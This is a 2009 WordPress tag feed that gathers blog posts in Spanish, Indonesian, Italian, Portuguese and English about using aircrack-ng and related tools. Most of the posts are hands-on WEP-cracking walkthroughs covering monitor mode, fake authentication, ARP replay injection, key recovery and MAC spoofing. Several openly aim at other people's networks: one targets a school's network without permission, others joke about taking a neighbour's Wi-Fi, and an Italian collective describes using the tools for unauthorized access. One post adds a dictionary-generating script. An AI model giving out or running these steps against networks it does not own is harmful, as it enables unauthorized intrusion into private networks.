aircrack-ng « WordPress.com Tag Feed

Generando Diccionarios con Python

Ruben — Sun, 18 Oct 2009 11:29:04 +0000

Este script en python genera diccionarios a partir de una semilla y con una longitud determinada, rellenando con ceros el valor numérico para mantener la longitud de la cadena. Puede ser útil por ejemplo si en algún momento olvidas la clave por defecto de TU PROPIA red inalámbrica ~~porque se te ha borrado la pegatina de debajo del router~~ pero sabes que las de tu proveedor siguen cierto patrón y necesitas un diccionario para obtener la clave por medio de alguna suite de auditoría wireless como airgrack-ng.

#! /usr/bin/env python

import os, string

#  le damos como entrada la semilla y la longitud
#  de la cadena numérica.
seed1 = ['X1V7',6]
seed2 = ['IX1VPV',7]

def dict(seed):
	max = 10**seed[1]
	format = '%#0'  + str(seed[1]) + 'd'
	for i in range(1,max):
		print seed[0] + format   % i

dict(seed1)
dict(seed2)

Aircrack-ng y Slitaz FTW!

fausto23 — Sun, 11 Oct 2009 02:28:24 +0000

Hay ciertas ocasiones en la cuales uno quiere robar, ayudar en la seguridad de red de digamos nuestro vecino, por ejemplo, para desmostrarle que su red inalambrica es insegura y que cualquiera puede romperla (Aunque ciertamente es por otras razones xD).

Para estos propositos contamos con WifiSlax o Backtrack, ahora se suma otra herramienta de los creadores de Aircrack-ng, es una modificacion de la distribucion Slitaz preparada con:

La suite Aircrack-ng 1.0 rc3
Madwifi-hal r4032 y Madwifi-ng r4032 con parche para inyectar
Otros drivers con parche para inyectar
Wireshark
Midnight commander
Nmap
Asi como los paquetes base de Slitaz

La ventaja de esta version modificada (ademas de contar con los ultimos parches) es que es muy ligera, la imagen ISO pesa menos de 60 mb y puede ser grabada en un CD, o en un USB para netbooks (soporte total para Acer Aspire ONE), inclusive instalada en un disco duro.

Ademas cuenta con scripts para actualizar la suite a la ultima version, iniciar automaticamente los modos de monitoreo, ademas de interfaz grafica (de manera predeterminada se maneja por consola y programas modo texto) solo con iniciar startx.

Otra utileria para la deteccion y ermm compartir redes.

Mata ne!

Sitio | Slitaz [Aircrack-Ng]
Distribucion base | Slitaz

menerobos jaringan nirkabel [iwl3945] (versi indonesia)

afifaneh — Tue, 06 Oct 2009 01:09:06 +0000

gara gara router mati, gini deh jadinya. jadi, pas itu iseng iseng aja pengen ngehack wireless sekolah. nah kebetulan, temen saya banyak yang pelit “soalnya pada ga mau kasi tau wep keys nya essid itu”. iya essid itu disebut SMA N 4 SMG_ICT XI. wep nya tuh 128 bits, sedangkan yang essid bagian sini disebut SMA N 4 SMG_ICT XII. sama sama punya wep, cuma ini router mati!!! (beberapa hari saat tulisan ini ditulis) (disini akan dituliskan tutorial hack wireless yang memiliki keamanan wep 128bit)
oke lanjut aja,
pastikan sistem operasi anda Linux (kayak stiker di behind-the-widescreen ku), mana aja deh, blankon bisa, debian base pokoke,
punya wireless card, ada layarnya,

punya saya :
BYON M3311 G, 1.73 GHz ConRoe, 1 GB RAM, 80GB HDD, i945 GM, IPW 3495 ABG.
Ubuntu 9.04 (Sabily), kernel 2.6.28.15.
aircrack-ng with patch for iwl3945 known as ipwraw

hari pertama (downloading alat)
ketikkan (ini alatnya)
sudo apt-get install aircrack-ng

gugling dulu ke situsnya
baca dokumentasinya

kenali dulu wireless card mu. buka terminal.

ketik iwconfig

pastikan bahwa network jalan pastikan bahwa wlan0 bukan wifi0
dan pastikan bahwa diri anda akan mengubahnya menjadi wifi0.

ketik lspci

ini dia (golan) namanya iwl3945
menurut dokumentasi, kudu dipatch drivernya, jangan takut mainan sama driver. ketik lagi

wget http://dl.aircrack-ng.org/drivers/ipwraw-ng-2.3.4-04022008.tar.bz2
tar -xjf ipwraw-ng* (keluarin dari kompresan)
cd ipwraw-ng (pindah folder)
make (mengompile tadi)
sudo make install (install driver e)
sudo make install_ucode
echo “blacklist ipwraw” | sudo tee /etc/modprobe.d/ipwraw (ngeblacklist ipwraw)
sudo depmod -ae (biar bagus)

ketik lsmod (pastikan belum kepasang)

nah, ada kan iwl3945

kita unload driver e

sudo modprobe -r iwl3945
sudo modprobe ipwraw

ketik iwconfig
ntar jadinya wifi0 dan kudu monitor mode

hari kedua (turun gunung)
ketikkan

aireplay-ng -9 wifi0

kudu iso
lalu

sudo airodump-ng wifi0

kita liat ad brapa
contoh, aku milih 00:1E:58:B5:56:7F itu bssid, dan itu essid nya SMA N 4 Smg_ICT XI

lanjut aj,

sudo airodump-ng -c 6 –bssid 00:1E:58:B5:56:7F -w wepdump -i wifi0

-c nya itu kan channel, tadi kan terbaca 6, terus yang –bssid itu mac addressnya

metode 1
catet stationnya, itu buat bikin fake id biar bisa masuk. jangan ditutup
open new window,

ketik

sudo aireplay-ng -1 0 -e SMA -a 00:1E:58:B5:56:7F -h 00:17:C4:2D:E9:D8 wifi0

-1 itu fake authentication, yang 0 timing, -e nama essid, -a target mac address, -h itu target fake user
nah iki, gagal, jajal timing nya diutak atik lagi

metode 2 (semangat)
metode ini membutuhkan iv (vektor) didumpingnya namane #data, nah, kita perlu injeksi biar sampe belas ribuan (recommended)

sudo aireplay-ng -3 -b 00:1E:58:B5:56:7F -h 00:22:43:32:D4:CA wifi0

-b target ap (access point) nya, -h fake user lagi
iki gambare,,,

open new window, sabarlah menunggu

sudo aircrack-ng -z -b 00:1E:58:B5:56:7F wepdump*.ivs

got this!!!!

metode 3 (cara bagus)
tanya saja adminnya, kan cuma beberapa digit.

setelah aircracking, balikkan tadi
sudo modprobe -r ipwraw
sudo modprobe iwl3945

(kalau mau browsing)
kalau mau injeksi essid lain yo monggo.

referensi : maxi-pedia.com

Tulisan ini dibuat untuk menyukseskan Lomba Blog Open Source P2I-LIPI dan Seminar Open Source P2I-LIPI 2009.

WPA Crack? NO, il suo kung fu è più forte!

U-Black — Tue, 22 Sep 2009 12:03:30 +0000

Come da titolo. Facciamo un pò di chiarezza sulle notizie spacciate in rete. Leggo in una marea di b

Auditar las redes WiFi de los vecinos desde MacOS

alecdotico — Tue, 18 Aug 2009 15:59:33 +0000

Desde el último post ha pasado un año, durante el cual he tenido el blog abandonado. Podría poner alguna excusa, como que me estaba esperando a que funcionara el LHC, o cualquier otra chorrada, pero simplemente no había ganas y punto

Pero ahora que vuelvo a ello quiero compartir con muchos de vosotros, maqueros que me leeis, la forma más efectiva de comprobar que vuestros vecinos utilizan un sistema de cifrado lo suficiente seguro para su conexión WiFi. Obviamente, la finalidad de este post es meramente educativa, para que el lector sea consciente de la fortaleza de un sistema WiFi, ya sea WEP o WPA.

Para empezar necesitamos capturar paquetes de las redes existententes. KisMAC es la herramienta perfecta para ello, ya que captura paquetes de todo tipo de redes, incluso las ocultas. La primera vez que abrimos el programa deberemos configurar el driver para la tarjeta de red, que en todos los portátiles actuales de Apple es una Airport Extreme, y elegimos el driver para el modo pasivo (promiscuo). Una vez añadido, lo seleccionamos y en el apartado Dump filter seleccionamos Keep everything, eligiendo el destino donde queremos que se guarde el log.

KisMAC permite hacer inyección de paquetes para descifrar la contraseña con otros drivers, pero no con Airport Extreme. Así que utilizaremos el programa descifrador por excelencia, la suite Aircrack, que ya se puede compilar en MacOS. La forma más cómoda es tener el gcc y el Subversion instalado (el gcc instalando las XCode Tools y el Subversion vía web), e instalar y compilar desde Terminal:

$ svn co http://trac.aircrack-ng.org/svn/trunk/ aircrack-ng
$ cd aircrack-ng
$ make
$ sudo make install

Después de reiniciar la Terminal ya tendremos los comandos de Aircrack en el path (y si no pues se añade /usr/local/bin/), así que sólo tendréis que pasarle el log creado por KisMAC como primer parámetro $ aircrack-ng Log. ya sabéis, a más paquetes capturados más fácil sacar la contraseña. También es recomendable echarle un ojo al manual de aircrack y las diferentes opciones que ofrece.

Por cierto, no me he enrollado mucho en la parte técnica para que no quedara muy largo, pero cualquier duda es bienvenida

Introducción al aircrack-ng

orfeos — Wed, 12 Aug 2009 00:18:12 +0000

Antes de entrar en materia con el aircrack me gustaría dejar algunas cositas claras, y bueno se que debe haber muchas maneras de hacer las cosas pero esta es la mas genérica, primero hacemos los pasos dictados “aquí”, luego si ya sabemos que funciona nuestra wifi usamos el siguiente comando:

$ ifconfig wlan0 down

# Ojo mirar cual es tu tarjeta la mía es wlan0, quita eso y pon la tuya !!!

Aveces la wifi se niega a morir así que deberíamos darle down 2 o 3 veces! Es mas terca que mi suegra mi wireless!!!

luego ponemos en modo monitor nuestra tarjeta:

$ iwconfig wlan0 mode monitor

# Esto para poner la targeta en modo promiscuo, para mirar paquetes y esas cosas.

Luego levantamos la wifi nuevamente(deberíamos cambiar la mac antes de levantar la red pero yo lo hago después)

# Me explico es recomendable cambiarla después de saber a que red queremos entrar!!!

Ahora levantamos la wifi:

$ ifconfig wlan0 up

Para llevar a cabo la auditoría o el rompimiento de la red en cuestión debemos instalarnos el aircrack y por que no el macchanger en debía se hace así:

$ apt-get install aircrack-ng macchanger

#si alguno no se instala me avisan con gusto te ayudo

Para otras distros usar su respectivo comando por ejemplo:

Para Mandriva:

# urpmi aircrack-ng

# urpmi macchanger

Para Fedora:

$ yum install aircrack-ng

$ yum install macchanger

Ojo he colocado lo del levantamiento de la wifi antes de instalar los paquetes ya que no tendría sentida instalar el aircrack y no poder usarlo!

Para ubuntu es igual que en debian chequeen esta pagina igual: http://domini-curiosidades.blogspot.com/2009/07/rompiendo-claves-wep-con-aircrack-ng.html

Bueno si ya pudiste instalar aircrack, ya podemos empezar pero sera luego ya que no me gusta sobre saturar los artículos!

Se me olvidaba aquí te dejo como cambiar la mac:

$ macchanger -m 00:11:22:33:44:55 wlan0

Nota: los números van de (0) a (9) y de la (a) a la (f)… Ya que estan en hexadecimal creo!!!

Estos fueron los sitios de donde saque la información:

http://www.blogterrier.com.ar/2009/07/crack-hack-seguridad-en-redes-wifi.html

http://tepito-online.blogspot.com/2009/06/aircrack-ng-manual-para-backtrack.html

Y algunos otros que no recuerdo lo unico que recuerdo es que use Google!!!

La imagen la saque de: http://www.marvel.netne.net/blog/

Cracking a WEP on HP Pavillion dv6k, Powered by Fedora 10

T1amat — Sun, 28 Jun 2009 17:14:39 +0000

Introduction.

I was interested in wireless security since I have read some articles in “Xakep” magazine several years ago. They were saying “Most wireless networks are vulnerable and can be cracked within a day”. It was quite embarrassing that such a security threat can exist and really wanted to check whether it was true or not. Those years I did not not have any piece of needed experience. The task to crash test WEP stayed in my mind for years. Recently I have tried it.

Disclaimer.

All material is presented for educational purposes only. Do not apply this material’s guidelines in real life on real networks. Especially the ones, which do not belong to you.

This in not a how-to. This is a description of my experience. I do not guarantee, that process and steps, described here, will be applicable in your case and that it will work for you as well as it worked for me. I am not in charge of your failures.

System used.

I have used HP laptop with Intel 3945 wifi card installed, powered by fedora 10.

Preparation

As a first step, we need to install and configure wireless driver and patch it properly to enable all types of attacks. As long, as I had Intel 3945 device, I needed iwl3945 (Not ipw3945) drivers. This is a cutting edge driver package and evolves on a daily basis. I would recommend some stable version, but you can try the latest build. I have downloaded and unpacked it.

As a next step, It needed to be to patched properly. I have downloaded correct patch, corresponded to my kernel from here. And applied it to the package. Next step is compiling the driver. After it is neede to check whether it works, or not. Run:

modprobe iwl3945

If there is no output, it means, iwl was successfully loaded as a kernel module. Make sure, that you have blacklisted your previous wifi driver. At this point it is better to reboot the system.

At last, we need to install airckrack-ng, and its dependencies, such as libnl and iw, which are needed for successful entering into monitoring mode.

Data collection

So, now it’s needed to collect some data about targets to attack. At first, we are entering monitoring mode:

airmon-ng check kill wlan0

This point is very important. If command completed successfully, it outputs something like “monitoring mode was enables on interface mon0″. Only of command was successful, we can proceed. If airmon-ng returned an error, we made mistake in prior steps, so the need to be redone. Also, one more important note. Since we ran airmon-ng, we have to work with mon0 interface instead of wlan0. Now we run

airodump-ng -i -w -u 1 –showack –berlin 5 mon0

And look and move around. looking for appropriate target to crack. When appropriate target found, set airodump to the same channel as target and re-run it:

airodump-ng -i -w –channel <victim_channel> -u 1 –showack –berlin 5 mon0

Now my PC and victim’s PC are set to the same channel and all IV’s are written on my disk. But there are not many IV’s flying around. There is a need to speed up a process. To do it, we open two new root terminals and running:

aireplay-ng -1 3 -e “<victim’s ssid>” -x 3 -o 3 -h <my MAC> -c <victim’s MAC> -j mon0

aireplay-ng -3 -o 3 -x 10 -e ” <victim’s ssid> ” mon0

It is a combination of two attacks. First one will identify you as authorized client, connected to the hot spot. It will enable us communicate with a hot spot. Second one will send ARP requests to the hot spot, what will cause AP to reply with ARP packets, containing IV. Probably, it is needed to play with a speed of attack. We need to stay in the attack mode unless about 20000 IV’s will be collected.

Crack

When needed amount of IV’s is captured, we need to run aircrack-ng on our capture file. something like:

airckrack-ng <name_of_capture_file>

airckrack-ng <name_of_capture_prefix>*

if there were several attempts to sniff packets. Get your key, or continue sniffing. Cheers.

Stop using WEP, use WPA2

Darren — Sun, 31 May 2009 04:53:03 +0000

The wireless LAN or wifi provides us an alternative way to connect to the Internet provided that your wireless device is in range of a wireless network. More people are utilizing this method to connect to the Internet since it is really easy to use. Wifi is so popular that no only Starbucks but coffee shops are providing wifi for their customer to use. But what most people are not aware of is the security wifi provides that would cause harm to their devices connected to the wifi or worst get charged for network criminal activities.

That is why it is important to encrypt their wireless routers with passwords. There are some wireless encryption standards that can be used which are WEP, WPA, WPA2. WEP has been shown to be easily breakable when correctly configured. WPA and WPA2 are much more stronger encryption than WEP. Most people would use WEP since most wireless routers default password encryption is WEP and they probably wouldn’t know the difference between those encryption standards anyway. WEP is so easy to break that some are using their neighbors wifi to connect to the Internet.

I wanted to know how to break the WEP encryption to see how easy it was. So I started googleing and I found that I don’t need to write actual codes to break it. There are programs on the Internet that helps you to do this. One that works is Aircrack-ng. It can be done on most operating systems but it works better on a Linux distribution. Here are few of the links that are useful:

I’m not encouraging to break into someone wifi and use their Internet access. Let’s put it this way, I want the world to know that WEP is not secure. So use WPA2 instead

Happy cracking…

(In the end I did not managed to crack the WEP encryption because my wireless adapter is Intel)

Hacking WEP with Kismac

Recuperar clave Wi-Fi

paran0id — Fri, 29 May 2009 14:52:14 +0000

Esta entrada la publico gracias a un manual que me pasó un amigo para recuperar una clave Wi-Fi perdida, lo que no me permite poner la fuente exacta.

Empecemos. Si has perdido tu clave y quieres tenerla de nuevo tienes que seguir los siguientes pasos:

Requisitos

SO GNU/Linux (opcional).

CD virgen o memoria USB de 1GB mínimo.

Portátil con tarjeta Wi-Fi integrada, no valen las USB.

Clave de red WEP en formato ASCII.

Tener tu red al alcance.

Herramientas

Opcional: SO Back Track (probado con la v3).

Si tienes K/Ubuntu, puedes hacer sudo aptitude install aircrack-ng

Yo lo he probado con el Live CD del Back Track.

Una vez lo tengamos todo, Live CD o instalada la aplicación aircrack en nuestro Ubuntu hacemos lo siguiente:

Pasos

1. Abrimos una terminal (le vamos a llamar T1) y escribimos lo siguiente para saber como se llama nuestra tarjeta:

iwconfig

Una vez identificada escribimos lo siguiente:

airmon-ng astart wifi0 (es un cero)

Con el siguiente comando veremos las redes que tenemos anuestro alrededor, cuando veas la tuya pulsa Ctrl+C y dejará de escanear.

airodump-ng ath1 (en mi caso, mi tarjeta es ath1)

Ahora, tienes que apuntar los siguientes datos: Canal y BSSID de tu red, y hacemos:

airodump-ng -c CANAL –bssid BSSID -w casa (nombre cualquiera)

2. Nueva terminal T2. Escribimos:

aireplay-ng –fakeauth 0 -e NOMBRE RED -a BSSID ath1 (o tu tarjeta y en fakeauth hay 2 guiones)

Si no nos muestra ningún mensaje de error o advertencias, significa que podremos continuar, de lo contrario no podremos hacer nada más. Si todo ha ido bien, escribimos:

aireplay-ng -3 -b BSSID ath1 -x 250

Ahora miramos en la T1 como en la columna DATA van aumentando los datos, esperamos a que llegue a 40.000 para no esperar mucho en el siguiente paso.

3. Nueva terminal T3. Cuando haya llegado a los 40.000 escribimos:

aircrack -ng -z -b BSSID casa*.cap

Ahora empezará a encontrar la combinación correcta de nuestra clave entre los datos recogidos. Si todo ha ido bien al final te mostrará tu clave WEP. Y así podrás volver a tenerla.

Todo esto sirve para cualquier red con claves WEP en ASCII.

Espero que a alguien le sirva, a mi me sirvió de mucho.

NOTA: yo de esto sé lo mínimo, así que si hay algún problema intentaré ayudar en lo que pueda.

Descriptar wep,wap com airodump-ng,aireplay-ng,aircrack-ng

juancarloscunha — Tue, 12 May 2009 18:42:24 +0000

Vejo em muitos blogs, pessoas tendo dificuldades para descriptar uma rede wirelless com chave WEP,WAP.

Vou dar uma receita de bolo aqui. Aqueles que são Script kiddies irão gostar, mas aqueles que querem realmente aprender: eu aconcelho a estudar, pois isso não é muito difícil, até fuçando você aprende.

Mas vamos ao que intereça.

Vou apresentar para vocês 4 programas que ajudan e auxiliam na descriptaçao da senha.

Airodump-ng, aireplay-ng, aircrack-ng, airmon-ng(nao usaremos, mas é bom voces pesquisarem um pouco sobre ele tambem).

Eu estou usando linux galera.

1º – ifconfig wlan() down //iremos definir uma conexão para a rede

2º – macchanger -m 00:11:22:33:44:55 wlan0 //definer uma MAC para a “wlan0”

3º – ifconfig wlan0 up //agora vamos fazer a wlan0 subir(definitivamente)

4º – airodump-ng wlan0 //Irá fazer com que pegue pacotes de todas as redes ativas, daí então você escolhe a rede que você quer si conectar, pegando o nome da autenticação que na maioria das vezes ficam no lado direito da tela do console. Assim que pegar a autenticação, dê um ctrl+c ou z para parar o recebimento dos pacotes.

5º – airodump-ng wlan0 -w autenticacao -c 8

Neste 5 passo, o seu computador irá capturar pacotes do alvo.

OBS: não pare o processo!

————————–Essa é a segunda etapa ——————————-

Abra uma nova janela do console do linux e vamos para a segunda etapa.

Nesta segunda etapa iremos acelerar o recebimento de pacotes com o aireplay-ng

1º – aireplay-ng -1 0 -e nome_da_rede_alvo –a //o nome da rede, você poderá obte-lo na primeira etapa.

2º – aireplay-ng -1 0 -e nome_da_rede_alvo -a 00:11:22:33:44:55 -h wlan0

3º – aireplay-ng -3 -b 00:11:22:33:44:55 -h wlan0 //acelerando captura de pacotes

Neste 3 passo, o seu computador irá acelerar a transmissão dos pacotes pacotes

OBS: não pare o processo!

————————–Essa é a terceira etapa——————————-

ABRA uma outra janela do console do linux e vamos para a terceira e ultima etapa da receita.

Espere alguns minutos(5 min), depois de acelerar os pacotes

1º – aircrack-ng teste.cap

Não esqueça de comentar

Guida all'uso di Aircrack-NG per utenti inesperti ( Linux )

h3yboy — Tue, 12 May 2009 16:58:31 +0000

Come promesso nell’ultimo post cominciamo la pubblicazione delle traduzioni dei tutorial presenti sul sito di Aircrack-NG.

Le politiche autoritarie della giunta Cofferati in merito agli spazi sociali hanno portato negli ultimi anni sul territorio di Bologna a numerosi sgomberi ed interventi repressivi, di cui il laboratorio Crash! a causa del suo protagonismo, della sua presenza costante nelle lotte sociali e della sua natura irriducibilmente antagoniste è stato più volte vittima.

Occupazione dopo occupazione, la nostra esperienza e la nostra capacità di autogestione collettiva è stata più volte posta di fronte a nuove sfide da affrontare, nuovi problemi da risolvere.

In particolare, l’instabilità a cui siamo stati costretti, ci ha portato ad affrontare il problema della mancanza della rete all’interno degli spazi che abbiamo liberato: un problema non da poco dal momento che consideriamo Internet e le tecnologie digitali come un mezzo essenziale del nostro agire politico quotidiano.

Per questo motivo in questi anni ci siamo approciati ad Aircrack-NG, un software libero, che ci ha permesso di avere accesso alla rete sopratutto quando ci siamo trovati nell’impossibilità di sottoscrivere un abbonamento con un qualsiasi provider. Abbiamo sempre utilizzato in modo cosciente questo strumento in modo discreto e non invasivo, riprendendoci un diritto alla comunicazione che negli anni ci è stato costantemente e sistematicamente negato ( assieme a molti altri ) sgombero dopo sgombero.

AirCrack-NG è sicuramente un ottimo strumento per testare la sicurezza delle reti wireless, è di facile utilizzo ed è un ottimo stimolo per apprendere qualcosa di più a proposito del funzionamento delle reti.

Abbiamo deciso di fare tesoro dell’esperienza accumulata e di condividerla con queste traduzioni in italiano dei tutorial che potete trovare sul sito di aircrack.

Speriamo possa essere utile ad altri compagni e compagne che loro malgrado si trovano o si sono trovati nella nostra situazione, come momentanea situazione di ripiego a quei singoli che si ritrovano senza connettività quando Telecom, per questioni di monopolio, decide di chiudere i rubinetti della connettività o per tutti quei soggetti che afflitti dalla precarietà esistenziale non possono permettersi di sottoscrivere un abbonamento internet.

Potete utilizzare aircrack-NG con delle semplici schede wireless USB o PCMCIA, non avete bisogno di nessun hardware particolarmente costoso.
Ovviamente suggerimenti, commenti e correzioni sono sempre graditi.
Usate questo strumento in modo cosciente e BUON DIVERTIMENTO!!

————————————————————————————————————————————————————————————————————————————

LINK ORIGINALE

Questo tutorial vi darà le basi per iniziare ad utilizzare la suite aircrack-ng. E’ impossibile fornire ogni singola informazione e coprire qualunque scenario. Così preparatevi a fare le vostre prove e ricerche. Il Forum ed il Wiki hanno molte informazioni e guide aggiuntive.

Sebbene non copra tutti I passi dall’inizio alla fine come questo tutorial, la guida Tecnica di base per craccare una WEP con Aircrack-ng copre gli effettivi passaggi di aircrack-ng molto più dettegliatamente.

Negli esempi, l’opzione “trattino doppio, bssid” viene mostrata come “- -bssid”. Ricordatevi di rimuovere lo spazio tra I due trattini quando la utilizzate sul campo.
Ciò vale anche per “- – ivs”, “- -arpreplay”, “- -deauth” e “- -fakeauth”.

PREDISPORRE L’HARDWARE, INSTALLARE AIRCRACK-NG

Il primo passo per far funzionare adeguatamente aircrack-ng sul vostro sistema Linux è patchare ed installare il driver adeguato alla vostra scheda wireless. Molte schede funzionano con driver multipli, alcuni dei quali forniscono le specifiche necessarie per utilizzare aircrack-ng, mentre altri non lo fanno.

Ovviamente, avrete bisogno di una scheda wireless compatibile con la suite aircrack-ng.
Questo è hardware che è pienamente compatibile ed in grado di iniettare pacchetti. Una scheda wireless compatibile può essere utilizzata per craccare un access point wireless in meno di un’ora.

Per determinare a quale categoria la vostra scheda appartiene, consultate la hardware compatibility page. Leggetevi il tutorial “Is My Wireless Card Compatible?” se non sapete dove cercare in questa tabella. Non fa mai male in ogni caso leggersi questo tutorial per ampliare le vostre conoscenze e determinare gli attributi della vostra scheda.

Per prima cosa, dovete sapere quale chipset sia utilizzato nella vostra scheda wireless e di quale driver abbia bisogno. La drivers section vi dirà di quali driver abbiate bisogno per il vostro specifico chipset. Scaricateli, e poi procuratevi la patch corrispondente da http://patches.aircrack-ng.org. (Queste patch abilitano il supporto per l’iniezione dei pacchetti).

Avendo un dispositivo Ralink USB, spiego i passaggi per farlo funzionare con Aircrack-ng. Prima che possiate compilare ed installare i drivers, dovete avere installate le sorgenti del kernel della vostra distribuzione.

Se vi occorre un altro tipo di scheda, controllate la installing drivers page per istruzioni sugli altri driver. Fate anche ricerca in rete, se non siete sicuri riguardo a come installarli.

RaLink USB rt2570 – GUIDA AL SETUP

Se avete un dispositivo USB rt2570 (come il D-Link DWL-g122 rev.B1 o il Linksys WUSB54G v4) dovreste utilizzare I driver di http://homepages.tu-darmstadt.de/~p_larbig/wlan
Sono speciali driver modificati, che supportano l’iniezione dei pacchetti e sono risultati lavorare al meglio con Aircrack-ng. Non hanno bisogno di essere patchati. Ovviamente questi driver vanno bene anche per le operazioni normali.

Scompattiamo, compiliamo ed installiamo I driver:

________________________________
tar xfj rt2570-k2wrlz-1.3.0.tar.bz2
cd rt2570-k2wrlz-1.3.0/Module
make
make install
_______________________________

L’ultimo passaggio deve essere eseguito come root. Usate “su” per diventare root. Ora possiamo caricare il modulo nel kernel
___________________________
modprobe rt2570
___________________________

Inserite la vostra scheda, ora dovrebbe essere riconosciuta come rausb0. Eseguite “iwconfig” per elencare I vostri dispositivi wireless e controllate che tutto funzioni.

INSTALLAZIONE DI AIRCRACK-NG

Sorgente

Procuratevi l’ultima versione di aircrack-ng dalla homepage: http://www.aircrack-ng.org
I comandi seguenti vanno cambiati se utilizzate una versione più recente del programma.

Scompattare, compilare, installare:

_________________________________
tar xfz aircrack-ng-0.9.1.tar.gz
cd aircrack-ng-0.9.1
make
make install
_________________________________

Come al solito, l’ultimo passaggio deve essere eseguito come root. Utilizzate “su” per loggarvi come root (utilizzate “sudo make install” su Ubuntu).

YUM

Se state usando un sistema come RedHat Linnux o Fedora potete installare aircrack-ng con Yum. Per prima cosa, dovete aggiungere la repository di Dag Wieers o Dries.

_________________________
su
yum -y install aircrack-ng
_________________________

RPM

Se state utilizzando un sistema che è basato sugli RPM potete facilitare l’installazione di aircrack-ng (esempio con RedHat Linux 4).

____________________
su
rpm -ihv http://dag.wieers.com/rpm/packages/aircrack-ng/aircrack-ng-0.7-1.el4.rf.i386.rpm
____________________

IMPORTANTE: Controllate http://dag.wieers.com/rpm/packages/aircrack-ng/
per l’ultima versione della suite aircrack-ng e cambiate il comando qui sopra per puntare all’ultima versione.

BASI DI IEEE 802.11

Ok, ora è tutto pronto ed è tempo di una sosta per imparare qualcosa sul funzionamento delle reti wireless prima di passare finalmente all’azione.

Il capitolo seguente è molto importante nel caso in cui qualcosa non funzionasse come previsto. Sapere di cosa tratta vi aiuta a trovare il problema o almeno a descriverlo a qualcun’altro in grado di aiutarvi. E’ un pochino scientifico e forse potreste voler saltarlo. Tuttavia alcune nozioni sono necessarie per craccare le reti wireless, e la cosa va oltre la semplice immissione di un comando per far svolgere ad aircrack il resto del lavoro.

COME VIENE RILEVATA UNA RETE WIRELESS

Questa è una piccola introduzione alle reti che funzionano tramite Access Point (AP). Ogni AP diffonde circa 10 cosiddetti “beacon-frames” al secondo. Questi pacchetti contengono le seguenti informazioni:

- Nome della rete (ESSID)
- Se sia utilizzata una cifratura (e di quale tipo; fate attenzione, non è sempre vero solo perché lo dice l’AP)
- Quali rates di dati in Mbit siano supportati
- Su quale canale si trova la rete

Queste informazioni vengono quindi visualizzate sulla vostra interfaccia di connessione a questa rete. Viene mostrato quando fate rilevare reti alla vostra scheda con
“iwlist <interfaccia> scan” e quando eseguite airodump-ng.

Ogni AP ha un unico indirizzo MAC (48 bit, 6 paia di numeri esadecimali). Tipo: 00:01:23:4A:BC:DE. Ogni dispositivo hardware di rete ha un indirizzo di questo tipo, ed I dispositivi di rete comunicano l’un l’altro utilizzando questo indirizzo MAC. Così, di base, é come un nominativo unico. Gli indirizzi MAC sono unici, non esistono due dispositivi di rete al mondo con un identico indirizzo MAC.

CONNETTERSI AD UNA RETE

Se volete connettervi ad una rete wireless, ci sono diverse possibilità . Nella maggior parte dei casi, si utilizza l’Open System Authentication (Opzionale: se volete saperne di più sull’autenticazione, vedete qui).

Open System Authentication

1. Richiedete l’autenticazione all’AP.
2. L’AP risponde: OK, siete autenticati.
3. Richiedete all’AP l’associazione.
4. L’AP risponde: OK, siete ora connessi.

Questo é il caso più semplice, MA potrebbero esserci alcuni problemi se non siete legittimati a connettervi:

- WPA/WPA2 sono in esecuzione, avete bisogno di autenticazione EAPOL. L’AP vi bloccherà al passo 2.
- L’Access Point ha una lista di client consentiti (indirizzi MAC), e non permette a nessun altro di connettersi. Ciò prende il nome di filtraggio MAC.
- L’Access Point utilizza l’Autenticazione a Chiave Condivisa, vi occorre fornire la corretta chiave WEP per essere in grado di connettervi (consultate il tutorial How to do shared key fake authentication? per tecniche avanzate).

SNIFFING E CRACCAGGIO SEMPLICI

Individuare le reti

La prima cosa da fare é individuare un potenziale bersaglio. La suite aircrack-ng contiene airodump-ng a tal fine – ma possono essere utilizzati anche altri programmi come Kismet.

Prima di iniziare a cercare reti, vi occorre mettere la vostra scheda di rete wireless in quello che viene chiamato “monitor mode”. Il Monitor Mode é una speciale modalità che consente al vostro PC di rilevare ogni pacchetto wireless presente nei paraggi. Questo Monitor Mode vi consente inoltre opzionalmente di iniettare pacchetti in una rete. L’iniezione sarà discussa più avanti in questo tutorial.

Per mettere la vostra scheda di rete wireless in Monitor Mode:

airmon-ng start rausb0

Per avere conferma che la vostra scheda wireless sia in Monitor Mode, eseguite “iwconfig”. La pagina di airmon-ng sul Wiki ha informazioni generiche su come avviarla per altri driver.

Quindi, avviate airodump-ng per ricercare le reti:

airodump-ng rausb0

“rausb0″ é il nome dell’interfaccia di rete (nic). Se state utilizzando un dispositivo di rete wireless diverso da un rt2570, dovrete utilizzare un diverso nome nic. Consultate la documentazione del driver nic.

Se airodump-ng può connettersi al dispositivo di rete wireless, vi apparirà una schermata come questa:

airodump-ng salta da canale a canale e mostra tutti gli access point da cui può ricevere beacon. I canali da 1 a 14 sono utilizzati per l’802.11b e g (negli USA, é permesso loro di usare soltanto quelli da 1 ad 11; da 1 a 13 in Europa salvo alcuni casi speciali; da 1 a 14 in Giappone). I canali da 36 a 149 vengono utilizzati per l’802.11a. Il canale corrente viene mostrato nell’angolo in alto a sinistra.

Dopo un breve intervallo di tempo appariranno alcuni AP e (si spera) alcuni client associati.

Il blocco superiore dei dati mostra gli access point individuati:

BSSID – L’indirizzo MAC dell’Ap
PWR – La forza del segnale. Alcuni driver non la riportano
Beacons – Numero di beacon frames ricevuto. Se non avete la forza del segnale, potete stimarla dal numero di beacon: più sono I beacon, migliore é la qualità del segnale.
Data – Numero di frammenti di dati ricevuti
CH – Canale su cui opera l’AP
MB – Velocità (o modalità AP). 11 é proprio dell’802.11b, 54 dell’802.11g. I valori intermedi rappresentano un misto.
ENC – Cifratura: OPN: nessuna cifratura, WEP: cifratura WEP, WPA: cifratura WPA o WPA2, WEP?: WEP o WPA (non si sa ancora)
ESSID – Il nome della rete. A volte é nascosto.

Il blocco dati inferiore mostra I client rilevati:

BSSID – Il MAC dell’AP a cui é associato il client
STATION – Il MAC del client stesso
PWR – La forza del segnale. Alcuni driver non la riportano
Packets – Numero di frammenti di dati ricevuti
Probes – Nomi di rete (ESSID) che questo client ha rilevato

